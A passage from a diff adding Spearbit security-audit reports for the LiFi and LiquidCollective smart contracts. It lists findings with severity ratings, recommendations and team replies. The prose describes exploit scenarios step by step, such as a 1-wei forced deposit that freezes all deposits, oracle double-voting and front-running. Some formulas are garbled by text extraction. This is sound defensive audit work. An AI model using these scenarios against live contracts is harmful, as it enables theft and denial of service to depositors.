removing dupli- cate imports can streamline the contract and improve maintainability. Recommendation: Consider removing the duplicate checks. import { LibMappings } from "../Libraries/LibMappings.sol"; import { Validatable } from "../Helpers/Validatable.sol"; - import { LibMappings } from "../Libraries/LibMappings.sol"; LiFi: Fixed in PR 270. Spearbit: Verified. +5.5.18 Extra checks in executeMessageWithTransfer() Severity: Informational Context: RelayerCelerIM.sol#L67-L111 Description: The function executeMessageWithTransfer() of RelayerCelerIM ignore the first parameter. seems this could be used to verify the origin of the transaction, which could be an extra security measure. It * @param * (unused) The address of the source app contract function executeMessageWithTransfer(address, ...) ... { } Recommendation: Check if it is useful to verify the value of the first parameter or executeMessageWithTrans- fer(). LiFi: Acknowledged. Spearbit: Acknowledged. 34 +5.5.19 Variable visibility is not uniform Severity: Informational Context: ThorSwapFacet.sol#L19, SynapseBridgeFacet.sol#L21 Description: In the current facets, state variables like router/messenger visibilities are not uniform, with some variables declared as public while others are private. thorchainRouter => is defined as public. synapseRouter => is defined as public. deBridgeGate => is defined as private Recommendation: Consider reviewing the codebase to identify variables with incorrect visibility settings. LiFi: Fixed with PR 285. Spearbit: Verified. +5.5.20 Library LibMappings not used everywhere Severity: Informational Context: LibMappings.sol Description: The library LibMappings is used in several facets. However, it is not used in the following facets • ReentrancyGuard • AxelarFacet • HopFacet.sol • MultichainFacet • OptimismBridgeFacet • OwnershipFacet Recommendation: Consider using LibMappings where possible. LiFi: Solved by removing LibMappings in all other facets, via PR 287. Spearbit: Verified. +5.5.21 transferERC20() doesn't have a null address check for receiver Severity: Informational Context: LibAsset.sol#L79-L98 Description: LibAsset.transferFromERC20() has a null address check on the receiver, but transferERC20() does not. Recommendation: Verify if this difference is intentional. Consider making these checks uniform across both functions depending on the requirement. LiFi: Fixed in PR 284. Spearbit: Verified. 35 +5.5.22 LibBytes can be improved Severity: Informational Context: LibBytes.sol Description: The following functions are not used • concat() • concatStorage() • equal() • equalStorage() • toBytes32() • toUint128() • toUint16() • toUint256() • toUint32() • toUint64() • toUint8() • toUint96() The call to function slice() for calldata arguments (as done in AxelarExecutor) can be replaced with the in-built slicing provided by Solidity. Refer to its documentation. Recommendation: Consider removing unused functions. If you want to depend on default Solidity primitives, you can remove the call to slice() with the default counterpart for calldata arrays. Note : Also SquidFacet inserting Strings library. The function can be kept in the LibBytes. LiFi: Fixed with PR 267. Spearbit: Verified. +5.5.23 Keep generic errors in the GenericErrors Severity: Informational Context: RelayerCelerIM.sol#L30 Description: During the code review, It has been noticed that some of the contracts are re-defined errors. The generic errors like a WithdrawFailed can be kept in the GenericErrors.sol Recommendation: It is recommended to review all errors and place them into the GenericErrors.sol. LiFi: Fixed with PR 271. Spearbit: Verified. 36 +5.5.24 Attention points for making the Diamond immutable Severity: Informational Context: src Description: There are additional attention points to decide upon when making the Diamond immutable: After removing the Owner, the following functions won't work anymore: • AccessManagerFacet.sol - setCanExecute() • AxelarFacet.sol - setChainName() • HopFacet.sol - registerBridge() • MultichainFacet.sol - updateAddressMappings() & registerRouters() • OptimismBridgeFacet.sol - registerOptimismBridge() • PeripheryRegistryFacet.sol - registerPeripheryContract() • StargateFacet.sol - setStargatePoolId() & setLayerZeroChainId() • WormholeFacet.sol - setWormholeChainId() & setWormholeChainIds() There is another authorization mechanism via LibAccess, which arranges access to the functions of • DexManagerFacet.sol • WithdrawFacet.sol Several Periphery contracts also have an Owner: • AxelarExecutor.sol • ERC20Proxy.sol • Executor.sol • FeeCollector.sol • Receiver.sol • RelayerCelerIM.sol • ServiceFeeCollector.sol Additionally ERC20Proxy has an authorization mechanism via authorizedCallers[] Recommendation: Consider doing the following • create an alternative way to update the essentials functions that are currently authorized via the owner, perhaps with LibAccess; • remove the authorizations of DexManagerFacet.sol and WithdrawFacet.sol or remove these facets; • evaluate the Periphery contracts and determine if the Owners should be locked down; • evaluate the authorization mechanism of ERC20Proxy and check what should be locked down. LiFi: Acknowledged. Spearbit: Acknowledged. 37 +5.5.25 Check on the final asset in _swapData Severity: Informational Context: MakerTeleportFacet.sol#L92 Description: MakerTeleportFacet verifies that the final received asset in _swapData is DAI. This check is not present in majority of the facets (including CircleBridgeFacet). Ideally, every facet should have the check that the final receivingAssetId is equal to sendingAssetId. Recommendation: Consider adding this check for all Facets. If you do, considering making a modifier for: if (_swapData.length == 0) { revert NoSwapDataProvided(); } if (_swapData[_swapData.length - 1].receivingAssetId != dai) { revert InvalidSendingToken(); } Alternatively, consider removing it everywhere because the transaction will revert anyway. LiFi: We decided to remove those checks from already existing facets such as MakerTeleportFacet. We make no token in the Diamond, so even if receivingAssetId is not equal to sendingAssetId, it will fail. Checked removed in PR 276. Spearbit: Verified. +5.5.26 Discrepancies in pragma versioning across faucet implementations Severity: Informational Context: AllBridgeFacet.sol#L2, ThorSwapFacet.sol#L2 Description: The use of different pragma versions in facet implementations can present several implications, with potential risks and compliance concerns that need to be addressed to maintain robust and compliant contracts. Recommendation: Consider changing pragmas with 0.8.17. LiFi: Solved in PR 277. Spearbit: Verified. +5.5.27 Inconsistent use of validateDestinationCallFlag() Severity: Informational Context: AmarokFacet.sol#L61-L65, SquidFacet.sol#L74-L79 Description: Highlighted code can be replaced with a call to validateDestinationCallFlag() function as done in other Facets. Recommendation: Replace the highlighted code with a call to validateDestinationCallFlag() function. LiFi: Fixed in PR 269. Spearbit: Verified. 38 +5.5.28 Inconsistent utilization of the isNativeAsset function Severity: Informational Context: AcrossFacet.sol#L106, LibAsset.sol#L97 Description: The isNativeAsset function is designed to distinguish native assets from other tokens within facet- based smart contract implementations. However, it has been observed that the usage of the isNativeAsset function is not consistent across various facets. Ensuring uniform application of this function is crucial for maintaining the accuracy and reliability of the asset identification and processing within the facets. Recommendation: Consider utilizing isNativeAsset function. LiFi: Fixed with PR 274. Spearbit: Verified. +5.5.29 Unused events/errors Severity: Informational Context: Executor.sol#L23-L24, HopFacetOptimized.sol#L26-L27, ThorSwapFacet.sol#L10 Description: The contracts contain several events and error messages that are not used anywhere in the contract code. These unused events and errors add unnecessary code to the contract, increasing its size. Recommendation: It is recommended to remove any unused events and errors from the contract code to make it more streamlined and easier to read. This can be done by performing a code review and identifying any events or errors that are not referenced in the contract code. LiFi: Fixed with PR 261 and PR 266. Spearbit: Verified. +5.5.30 Make bridge parameters dynamic by keeping them as a parameter Severity: Informational Context: HopFacetOptimized.sol#L147, MakerTeleportFacet.sol#L115 Description: The current implementation has some bridge parameters hardcoded within the smart contract. This approach limits the flexibility of the contract and may cause issues in the future when upgrades or changes to the bridge parameters are required. It would be better to keep the bridge parameters as a parameter to make them dynamic and easily changeable in the future. HopFacetOptimized.sol => Relayer & RelayerFee MakerTeleportFacet.sol's => Operator person (or specified third party) responsible for initiating minting process on destination domain by providing (in the fast path) Oracle attestations. Recommendation: Modify the smart contract code to include bridge parameters as a parameter rather than hardcoding them. This will allow for easier upgrades and changes to the bridge parameters in the future without the need for extensive modifications to the code. LiFi: Acknowledged. Spearbit: Acknowledged. 39 +5.5.31 Incorrect comment Severity: Informational Context: CircleBridgeFacet.sol#L32 Description: The highlighted comment incorrectly refers USDC address as DAI address. Recommendation: - + /// @param _usdc The address of DAI on the source chain. /// @param _usdc The address of USDC on the source chain. LiFi: Fixed in PR 264. Spearbit: Verified. +5.5.32 Redundant console log Severity: Informational Context: ThorSwapFacet.sol#L13 Description: The contract includes Console.sol from test file, which is only used for debugging purposes. In- cluding it in the final version of the contract can increase the contract size and consume more gas, making it more expensive to deploy and execute. Recommendation: Consider removing console.sol. LiFi: Fixed with PR 261. Spearbit: Verified. +5.5.33 SquidFacet doesn't revert for incorrect routerType Severity: Informational Context: SquidFacet.sol#L174 Description: If _squidData.routeType passed by the user doesn't match BridgeCall, CallBridge, or Call- BridgeCall, SquidFacet just takes the funds from the user and returns without calling the bridge. This, when the combined with the issue "Max approval to any address is possible", lets anyone steal those funds. Note: Solidity enum checks should prevent this issue, but it is safer to do an extra check. Recommendation: Add an else condition which just reverts. LiFi: Fixed in PR 248. Spearbit: Verified. 40 diff --git a/findings_newupdate/spearbit/LiquidCollective-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/LiquidCollective-Spearbit-Security-Review.txt new file mode 100644 index 0000000..f1017ea --- /dev/null +++ b/findings_newupdate/spearbit/LiquidCollective-Spearbit-Security-Review.txt @@ -0,0 +1,85 @@ +6.1.1 An attacker can freeze all incoming deposits and brick the oracle members' reporting system with only 1 wei Severity: Critical Risk Context: SharesManager.1.sol#L195-L206 Description: An attacker can brick/lock all deposited user funds and also prevent oracle members to come to a quorum when there is an earning to be distributed as rewards. Consider the following scenario: 1. The attacker force sends 1 wei to the River contract using, e.g., selfdestruct. The attacker has to make sure to perform this transaction before any other users deposit their funds in the contract. The attacker can look at the mempool and also front-run the initial user deposit. Now the b = _assetBalance() > 0, is at least 1 wei. 2. Now an allowed user tries to deposit funds into the River protocol. The call eventually ends up in _- mintShares(o, x) and in the 1st line oldTotalAssetBalance = _assetBalance() - x, _assetBalance() represents the updated River balance after taking into account the x deposit as well by the user. So _as- setBalance() is now b + x + ... and oldTotalAssetBalance = b + ... where the ... includes beacon balance sum, deposited amounts for validators in queue, ... (which is probably 0 by now). Therefore, oldTo- talAssetBalance > 0 means that the following if block is skipped: if (oldTotalAssetBalance == 0) { _mintRawShares(_owner, _underlyingAssetValue); return _underlyingAssetValue; } And goes directly to the else block for the 1st allowed user deposit: else { uint256 sharesToMint = (_underlyingAssetValue * _totalSupply()) / oldTotalAssetBalance; _mintRawShares(_owner, sharesToMint); return sharesToMint; } But since shares have not been minted yet _totalSupply() == 0, and therefore sharesToMint == 0. So we mint 0 shares for the user and return 0. Note that _assetBalance() keeps increasing, but _totalSupply() or Shares.get() remains 0. 3. Now the next allowed users deposit funds and just like step 2. River would mint them 0 shares, _assetBal- ance() increases but _totalSupply() or Shares.get() remains 0. Note that _totalSupply() or Shares.get() remains 0 until the oracle members come to a quorum for the beacon balance sum and number of validators for a voting frame. Then the last oracle member who calls the report- Beacon to trigger the quorum causes a call to _pushToRiver which in turn calls river.setBeaconData. Now in setBeaconData if we have accumulated interest then _onEarnings is called. The 1st few lines of _onEarnings are: uint256 currentTotalSupply = _totalSupply(); if (currentTotalSupply == 0) { revert ZeroMintedShares(); } But _totalSupply() is still 0 so revert ZeroMintedShares() is called and the revert bubbles up the stack of call to reportBeacon, which means that the last oracle member that can trigger a quorum will have its call to reportBeacon reverted. Therefore, no quorums will ever be made which has some earnings and the River protocol will stay unaware of its deposited validators on the beacon change. Any possible path to _mintRawShares (which could cause Shares.get() to increase) is also blocked and _totalSupply() would stay at 0. 10 So even after validators, oracle members, etc.. become active, when an allowed user deposits they would receive 0 shares. Note, that an attacker can turn this into a DoS attack for the River Protocol, since redeployment alone would not solve this issue. The attacker can monitor the mempool and always try to be 1st person to force deposit 1 wei into the River deployed contract. Alluvial: If we change the condition that checks if the old underlying asset balance is zero to checking if the total shares is under a minimum amount (so we would mint 1:1 as long as we haven't reached that value) would it solve the issue? This minimum value can be DEPOSIT_SIZE as the price per share should be 1:1 anyway as no revenue was generated. Spearbit: Yes, this would solve this issue. Alluvial can also as part of an atomic deployment send 1 wei and mint the corresponding share using a call to the internal function _mintRawShares. Also note, we should remove the check for oldTotalAssetBalance == 0 as oldTotalAssetBalance is used as the denominator for sharesToMint. There could be some edge scenarios where the _totalSupply() is positive but oldTotalAssetBalance is 0. So if extra checks are introduced for _totalSupply(), we should still keep the check or a modified version for oldTotalAssetBalance. Spearbit: In PR: • [SPEARBIT/4] Add a ethToDeposit storage var that accounts for incoming ETH introduces BalanceToDeposit storage variable. Alluvial This variable is basically replacing ad- dress(this).balance for River in multiple places including _assetBalance() function. The BalanceToDeposit can only be modified when: 1. An allowed user deposits into River which will increase BalanceToDeposit and also total minted shares 2. An entity (in later commits only the admin can call this endpoint) calls depositToConsensusLayer which might reduce the BalanceToDeposit amount but the net effect on _assetBalance() would be zero. That would also mean BalanceToDeposit should have been non-zero to begin with. 3. A call to setConsensusLayerData by the Oracle (originated by a call to reportConsensusLayerData by an oracle member) which will pull fees from ELFeeRecipientAddress (in later commits it will only pull fees if needed and up to a max amount) and would increase BalanceToDeposit. Note the attack in this issue works by making sure _assetBalance() is non-zero while _totalSupply() is zero. That means we cannot afford a call to end up at _onEarnings for this scheme to work. Since if _totalSupply() == 0, _onEarnings would revert. That means even with a malicious group of oracle members reporting wrong data, if a call ends up at setConsensusLayerData with _validatorCount = 0 and _validatorTotalBalance > 0, _onEarnings would trip. Also if the oracle members are not malicious and just report _validatorCount = 0 and _validatorTotalBalance = 0, but an attacker force sends 1 wei to ELFeeRecipientAddress, the same thing happens again and _onEarnings would revert since no shares are minted yet, That means all the possible ways to have a net positive effect on BalanceToDeposit (and thus _assetBalance()) while keeping _totalSupply() zero is blocked. But _assetBalance() = ( BalanceToDeposit.get() + CLValidatorTotalBalance.get() + (DepositedValidatorCount.get() - CLValidatorCount.get()) * ConsensusLayerDepositManagerV1.DEPOSIT_SIZE ,! ); or where: • B is _assetBalance() B = D + Bv + 32(Cd (cid:0) Cv ) 11 • D is BalanceToDeposit.get() • Bv is CLValidatorTotalBalance.get() • Cd is DepositedValidatorCount.get() • Cv is CLValidatorCount.get() Also Cv (cid:20) Cd is an invariant. Bv , Cv are only set in setConsensusLayerData and thus can only be changed by a quorum of oracle members. Cd only increases and is only set in depositToConsensusLayer and requires a positive D. After a call to depositToConsensusLayer, (cid:1)D = (cid:0)32(cid:1)Cd ( (cid:1)B = 0 ). Thus putting all this info together, all the possible points of attack to make sure B will be positive while keeping _totalSupply() zero are blocked. A note for the future: when users are able to withdraw their investment and burn their shares if all users withdraw and due to some rounding errors or other causes B stays positive, then the next user to deposit and mint a share would receive zero shares. +6.1.2 Operators._hasFundableKeys returns true for operators that do not have fundable keys Severity: Critical Risk Context: Operators.sol#L149-L154 Description: Because _hasFundableKeys uses operator.stopped in the check, an operator without fundable keys be validated and return true. Scenario: Op1 has • keys = 10 • limit = 10 • funded = 10 • stopped = 10 This means that all the keys got funded, but also "exited". Because of how _hasFundableKeys is made, when you call _hasFundableKeys(op1) it will return true even if the operator does not have keys available to be funded. By returning true, the operator gets wrongly included in getAllFundable returned array. That function is critical because it is the one used by pickNextValidators that picks the next validator to be selected and stake delegate user ETH. Because of this issue in _hasFundableKeys also the issue OperatorsRegistry._getNextValidatorsFromActive- Operators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys) can happen DOSing the contract that will always make pickNextValidators return empty. Check Appendix for a test case to reproduce this issue. Recommendation: Alluvial should reimplement the logic of Operators. _hasFundableKeys that should return true if and only if the operator is active and has fundable keys. The attribute stopped should not be used. Alluvial: Recommendations implemented in PR SPEARBIT/3. Spearbit: Acknowledged. 12 +6.1.3 OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys) Severity: Critical Risk Context: OperatorsRegistry.1.sol#L403-L454 Description: This issue is also related to OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator . Consider a scenario where we have Op at index 0 name op1 active true limit 10 funded 10 stopped 10 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 In this case, • Op1 got all 10 keys funded and exited. Because it has keys=10 and limit=10 it means that it has no more keys to get funded again. • Op2 instead has still 10 approved keys to be funded. Because of how the selection of the picked validator works uint256 selectedOperatorIndex = 0; for (uint256 idx = 1; idx < operators.length;) { if ( operators[idx].funded - operators[idx].stopped < operators[selectedOperatorIndex].funded - operators[selectedOperatorIndex].stopped ) { selectedOperatorIndex = idx; } unchecked { ++idx; } } When the function finds an operator with funded == stopped it will pick that operator because 0 < operators[selectedOperatorIndex].funded - operators[selectedOperatorIndex].stopped. After the loop ends, selectedOperatorIndex will be the index of an operator that has no more validators to be funded (for this scenario). Because of this, the following code uint256 selectedOperatorAvailableKeys = Uint256Lib.min( operators[selectedOperatorIndex].keys, operators[selectedOperatorIndex].limit ) - operators[selectedOperatorIndex].funded; when executed on Op1 it will set selectedOperatorAvailableKeys = 0 and as a result, the function will return return (new bytes[](0), new bytes[](0));. 13 In this scenario when stopped==funded and there are no keys available to be funded (funded == min(limit, keys)) the function will always return an empty result, breaking the pickNextValidators mechanism that won't be able to stake user's deposited ETH anymore even if there are operators with fundable validators. Check the Appendix for a test case to reproduce this issue. Recommendation: Alluvial should • reimplement the logic of Operators. _hasFundableKeys that should select only active operators with fund- able keys without using the stopped attribute. • reimplement the logic inside the OperatorsRegistry. _getNextValidatorsFromActiveOperators loop to correctly pick the active operator with the higher number of fundable keys without using the stopped attribute. Alluvial: Recommendation implemented in SPEARBIT/3. Spearbit: Acknowledged. 6.2 High Risk +6.2.1 Oracle.removeMember could, in the same epoch, allow members to vote multiple times and other members to not vote at all Severity: High Risk Context: Oracle.1.sol#L213-L222 Description: The current implementation of removeMember is introducing an exploit that allows an oracle member to vote again and again (in the same epoch) and an oracle that has never voted is prevented from voting (in the same epoch). Because of how OracleMembers.deleteItem is implemented, it will swap the last item of the array with the one that will be deleted and pop the last element. Let's make an example: 1) At T0 m0 to the list of members → members[0] = m0. 2) At T1 m1 to the list of members → members[1] = m1. 3) At T3 m0 call reportBeacon(...). By doing that, ReportsPositions.register(uint256(0)); will be called, registering that the member at index 0 has registered the vote. 4) At T4, the oracle admin call removeMember(m0). This operation, as we said, will swap the member's address from the last position of the array of members with the position of the member that will be deleted. After doing that will pop the last position of the array. The state changes from members[0] = m0; members[1] = m1 to members[0] = m1;. At this point, the oracle member m1 will not be able to vote during this epoch because when he/she will call reportBeacon(...) the function will enter inside the check. if (ReportsPositions.get(uint256(memberIndex))) { revert AlreadyReported(_epochId, msg.sender); } This is because int256 memberIndex = OracleMembers.indexOf(msg.sender); will return 0 (the position of the m0 member that have already voted) and ReportsPositions.get(uint256(0)) will return true. At this point, if for whatever reason an admin of the contract add again the deleted oracle, it would be added to the position 1 of the array of the members, allowing the same member that have already voted, to vote again. Note: while the scenario where a removed member can vote multiple time would involve a corrupted admin (that would re-add the same member) the second scenario that prevent a user to vote would be more common. Check the Appendix for a test case to reproduce this issue. 14 Recommendation: After removing a member from OracleMembers remove also the information relative to the removed member from both ReportsPositions and ReportsVariants. If the single removal is not possible, clear the entire state of both ReportsPositions and ReportsVariants. The consequence would be that all the active members would need to vote again for the same epoch. Alluvial: Recommendation implemented in SPEARBIT/2. Spearbit: Acknowledged. Note: After removing an oracle member, all the "valid" members that have already voted for the epoch must vote again (everything is erased). We suggest documenting this behavior to clear any confusion for active oracle members. +6.2.2 Order of calls to removeValidators can affect the resulting validator keys set Severity: High Risk Context: OperatorsRegistry.1.sol#L310 Description: If two entities A and B (which can be either the admin or the operator O with the index I) send a call to removeValidators with 2 different set of parameters: • T1 : (I, R1) • T2 : (I, R2) Then depending on the order of transactions, the resulting set of validators for this operator might be different. And since either party might not know a priori if any other transaction is going to be included on the blockchain after they submit their transaction, they don't have a 100 percent guarantee that their intended set of validator keys are going to be removed. This also opens an opportunity for either party to DoS the other party's transaction by frontrunning it with a call to remove enough validator keys to trigger the InvalidIndexOutOfBounds error: OperatorsRegistry.1.sol#L324-L326: if (keyIndex >= operator.keys) { revert InvalidIndexOutOfBounds(); } to removeValidators and compare it Recommendation: We can send a snapshot block parameter to a stored field for the operator and make sure there have not been any changes to the validator key set since that snapshot block. Alluvial has introduced such a mechanism for setOperatorLimits in 030b52feb5af2dd2ad23da0d512c5b0e55eb8259. A similar technique can be used here. Alluvial: Don't think this is really an issue. On a regular basis, the admin would not remove the keys but would request the Node Operator to remove the keys (because a key is unhealthy for example). In case a Node Operator refuses to remove the key (which is unexpected because this is would be against terms and conditions) then the admin could deactivate the operator and then remove the key without being exposed to the front run attack. This is not as sensitive as the front run we had on setOperatorLimit because in this case, we are not making any keys eligible for funding. So the consequences are not this bad. Worst case the admin deactivates the node operator and there is no issue anymore. Spearbit: We think the issue still needs to be documented both for the admin and also for the operators. Because in the scenario above both A and B can be the operator O. And O might send two transactions T1, T2 thinking T1 would be applied to the state before T2 (this might be unintentional, or intentional maybe because of something like out-of-gas issues). But it is possible that the order would be reversed and the end result would not be what the operator had expected. And if the operator would not check this, the issue can go unnoticed. 15 +6.2.3 _hasFundableKeys marks operators that have no more fundable validators as fundable. Severity: High Risk Context: Operators.sol#L151-L152 Description: Since operator.keys >= operator.limit (based on the checks when operator.keys has been set), we can simplify _hasFundableKeys's return expression to: operator.active && operator.limit > (operator.funded - operator.stopped) Also based on the assumption at Non-zero operator.limit should always be greater than or equal to opera- tor.funded , if true: operator.limit >= operator.funded This means an active operator that has at (_hasFundableKeys(operator) == true) least one stopped validator would pass the test (stop, funded, limit, keys) = (s, F, L, K) // where s > 0 Even operators that have their funded equal to their limit: (stop, funded, limit, keys) = (s, F, F, K) // where s > 0 Although they are maxed out for further funding. For these cases _hasFundableKeys returns true. So based on these findings it would make sense to have this function return: operator.active && ( operator.limit > operator.funded ) Unless some other changes are applied to OperatorResgistry.1.sol, specially its _getNextValidatorsFromAc- tiveOperators function. Also, note that funded, limit, and keys are not only counters for the operator's struct, but also they define ranges in ValidatorKeys for the operator (based on the way that they have been used in OperatorResgistry.1.sol). And this is one of the main differences between these 3 fields and the stopped field. The stopped field is only used as a counter. Alluvial: Exactly! We shouldn't take stopped into account for the _hasFundableKeys, but we should keep it in the optimal operator search as we want to favor operators with the lowest count of running validators. Spearbit: So basically stopped is used for maybe bookkeeping off-chain and also for the optimal search algorithm for picking the next validators. Alluvial: Yes, currently it's more like a manual feature because exits should be rare but it will be a core part of the process once withdrawals are here and operators will often have to exit validators for users to redeem ETH. Recommendation implemented in SPEARBIT/3. Spearbit: Acknowledged. 16 +6.2.4 Non-zero operator.limit should always be greater than or equal to operator.funded Severity: High Risk Context: OperatorsRegistry.1.sol#L241, OperatorsRegistry.1.sol#L428-L430 Description: For the subtraction operation in OperatorsRegistry.1.sol#L428-L430 to not underflow and revert, there should be an assumption that operators[selectedOperatorIndex].limit >= operators[selectedOperatorIndex].funded Perhaps this is a general assumption, but it is not enforced when setOperatorLimits is called with a new set of limits. Recommendation: Add a check in setOperatorLimits to enforce the new limits for the operators to be either 0 or in the range [limit, keys]. If these assumptions are not correct, what would having 0 < limit < funded signify? Also, what would setting the limit to 0 when funded is positive signify? Alluvial: Implemented in SPEARBIT/3. Spearbit: Acknowledged. 6.3 Medium Risk +6.3.1 Decrementing the quorum in Oracle in some scenarios can open up a frontrunning/backrunning opportunity for some oracle members Severity: Medium Risk Context: • Oracle.1.sol#L338-L370 • Oracle.1.sol#L260 • Oracle.1.sol#L156 @ 030b52feb5af2dd2ad23da0d512c5b0e55eb8259 Description: Assume there are 2 groups of oracle members A, B where they have voted for report variants Va and Vb respectively. Let's also assume the count for these variants Ca and Cb are equal and are the highest variant vote counts among all possible variants. If the Oracle admin changes the quorum to a number less than or equal to Ca + 1 = Cb + 1, any oracle member can backrun this transaction by the admin to decide which report variant Va or Vb gets pushed to the River. This is because when a lower quorum is submitted by the admin and there exist two variants that have the highest number of votes, in the _getQuorumReport function the returned isQuorum parameter would be false since repeat == 0 is false: Oracle.1.sol#L369: return (maxval >= _quorum && repeat == 0, variants[maxind]); Note that this issue also exists in the commit hash 030b52feb5af2dd2ad23da0d512c5b0e55eb8259 and can be triggered by the admin either by calling setQuorum or addMember when the abovementioned conditions are met. Also, note that the free oracle member agent can frontrun the admin transaction to decide the quorum earlier in the scenario above. Thus this way _getQuorumReport would actually return that it is a quorum. Recommendation: This issue is similar to The reportBeacon is prone to front-running attacks by oracle members. We recommend always checking that after the modifications are done to the set of oracle members, setting the new quorum would respect the Q > Note that the invariant provided here is slightly stronger than the one in issues/54 since we are assuming the last oracle member to vote can go either way and doesn't need to belong to a particular group. issues/54 could also invariant. Here Q is the quorum and C is the number of all oracle members. C + 1 2 have been worded that way and the invariant would have been Q > C + 1 2 (also note this only applies when C1). 17 Alluvial: The solution provided on liquid-collective/liquid-collective-protocol#151 should be solving the issue (clearing report data whenever member is added or removed + quorum is changed). Not sure how the new proposed quorum invariant solves the issue. Spearbit: After a quick test (located in Appendix) and think that with your changes the contract will push to river the report of a removed member. Scenario: • member1 added oracle.addMember(om1, 1);. • member2 added oracle.addMember(om1, 2);. • member2 call reportConsensusLayerData, _pushToRiver is not called because we have a quorum of 2. • member2 is removed because it's a malicious oracle member oracle.removeMember(om2, 1); this action will trigger a _pushToRiver because reports are cleared at the end of _setQuorumAndClearReports. • as a consequence, the vote of a malicious oracle has triggered _pushToRiver with probably a malicious report. Alluvial: After discussing with the team, we decided to always clear the reports whenever we add a member, remove a member or change the quorum. We removed the logic that would check if a report could be forwarded to River from the _setQuorum internal method (that has been renamed to _clearReportsAndSetQuorum). So from now on we expect oracle operators to resubmit their votes whenever on of the three actions happens. Spearbit: The solution provided on liquid-collective/liquid-collective-protocol#151 should be solving the issue (clearing report data whenever member is added or removed + quorum is changed). Not sure how the new proposed quorum invariant solves the issue. The proposed inequality check would have solved the issue and also would have fixed: • The reportBeacon is prone to front-running attacks by oracle members But with the current implementation of • PR #151 This issue is solved, since in the _setQuorum we don't check for isQuorum and also when adding/removing an oracle member or setting the quorum we also clear the oracle member reports. The acceptable range for Q the quorum is Q 2 by oracle members. The current invariant check: C + 1 2 , C to fix The reportBeacon is prone to front-running attacks (_newQuorum == 0 && memberCount > 0) || _newQuorum > memberCount can be changed to: ( memberCount > 1 && !(2 * _newQuorum > (memberCount + 1)) ) || ( memberCount > 0 && _newQuorum == 0 ) || ( memberCount < _newQuorum ) Again, if this new inequality is not going to be checked on-chain, it should be documented and also checked off-chain. Alluvial: We are fine not constraining the quorum, We added a comment about it in the natspec. Spearbit: Acknowledged. 18 +6.3.2 _getNextValidatorsFromActiveOperators can be tweaked to find an operator with a better validator pool Severity: Medium Risk Context: OperatorsRegistry.1.sol#L417-L420 Description: Assume for an operator: (A, B) = (funded - stopped, limit - funded) The current algorithm finds the first index in the cached operators array with the minimum value for A and tries to gather as many publicKeys and signatures from this operator's validators up to a max of _requestedAmount. But there is also the B cap for this amount. And if B is zero, the function returns early with empty arrays. Even though there could be other approved and non-funded validators from other operators. Related: OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator , OperatorsRegistry._getNextValidatorsFromActiveOperators can DOS Alluvial staking if there's an operator with funded==stopped and funded == min(limit, keys) , _hasFundableKeys marks operators that have no more fundable validators as fundable. Recommendation: A better search algorithm would be to try to find an operator by minimizing A but also maximiz- ing B. But the only linear cost function that would avoid this shortfall above is -B. If the minimum of -B all operators is 0, then we can conclude that for all operators B == 0 and thus limit == funded for all operators. So no more approved fundable validators left to select. Note, that we can also look at non-linear cost functions or try to change the picking algorithm in a different direction. Alluvial: It's ok to pick the operator with the least running validators as the best one even if he doesn't have a lot of fundable keys. The check for fundable should be edited to not take stopped into account, that way we can be sure that the cached operator list contains operators with at least 1 fundable key and focus entirely on finding the operator with the lowest active validator count. The end goal of the system is to even the validator count of all operators. Of course limits will be set to similar values but new operators with low validator numbers should be prioritised to catch up with the rest of the operators. Spearbit: We can also tweak the current algorithm to not just pick the 1st found operator with the lowest non- stopped funded number of validators, but pick one amongst those that also have the highest approved non-funded validators. Basically with my notations from the previous comment, among the operators with the lowest A, pick the one with the highest B. We can tweak the search algorithm to favor/pick an operator with the highest number of allowed non-funded validators amongst the operators with the lowest number of non-stopped funded validators (As a side effect, this change also has negative net gas on all tests, gas is more saved). 19 uint256 selectedFunded = operators[selectedOperatorIndex].funded; uint256 currentFunded = operators[idx].funded; uint256 selectedNonStoppedFundedValidators = ( selectedFunded - operators[selectedOperatorIndex].stopped ); uint256 currerntNonStoppedFundedValidators = ( currentFunded - operators[idx].stopped ); bool equalNonStoppedFundedValidators = ( currerntNonStoppedFundedValidators == selectedNonStoppedFundedValidators ); bool hasLessNonStoppedFundedValidators = ( currerntNonStoppedFundedValidators < selectedNonStoppedFundedValidators ); bool hasMoreAllowedNonFundedValidators = ( operators[idx].limit - currentFunded > operators[selectedOperatorIndex].limit - selectedFunded ); if ( hasLessNonStoppedFundedValidators || ( equalNonStoppedFundedValidators && hasMoreAllowedNonFundedValidators ) selectedOperatorIndex = idx; ) { } Spearbit: The picking algorithm has been changed in PR SPEARBIT/3 slightly by adding a MAX_VALIDATOR_- ATTRIBUTION_PER_ROUND per round and keeping track of the picked number of validators for an operator. Thus the recommendation in this issue is not fully implemented, but the early return issue has been fixed. So the new operator picking algorithm is changed to (below the subscripts f refers to funded, p picked, s stopped, l limit): o(cid:3) = argmin o2Operators fof + op (cid:0) os j oa ^ (ol > of + op)g And once the operator o is selected, we pick the number of validation keys based on: o(cid:3) = argmin o2Operators fof + op (cid:0) os j oa ^ (ol > of + op)g That means for each round we pick maximum MAX_VALIDATOR_ATTRIBUTION_PER_ROUND = 5 validator keys. There could be also scenarios where each operator ol (cid:0) (of + op) = 1, which means at each round we pick exactly 1 key. Now, if count is a really big number, we might run into out-of-gas issues. One external call triggers _pickNextValidatorsFromActiveOperators is ConsensusLayerDepositMan- agerV1.depositToConsensusLayer which currently does not have any access control modifier. So anyone can call into it. But from the test files, it seems like it might be behind a firewall that only an executor might have that 20 permission to call into. Is that true that depositToConsensusLayer will always be behind a firewall? In that case, we could move the picking/distribution algorithm off-chain and modify the signature of depositToConsensusLayer to look like: function depositToConsensusLayer( uint256[] calldata operatorIndexes, uint256[] calldata validatorCounts ) external So we provide depositToConsensusLayer with an array of operators that we want to fund and also per operator the number of new validator keys that we would like to fund. Note that this would also help with the out-of-gas issue mentioned before. Why is the picking/distribution algorithm currently on-chain? Is it because it is kind of transparent for the operators how their validators get picked? Alluvial: we would like to keep things that should be transparent for end users inside the contract. Knowing that the validators are properly split between all operators is important as operator diversification is one of the advertised benefits of liquid staking. +6.3.3 Dust 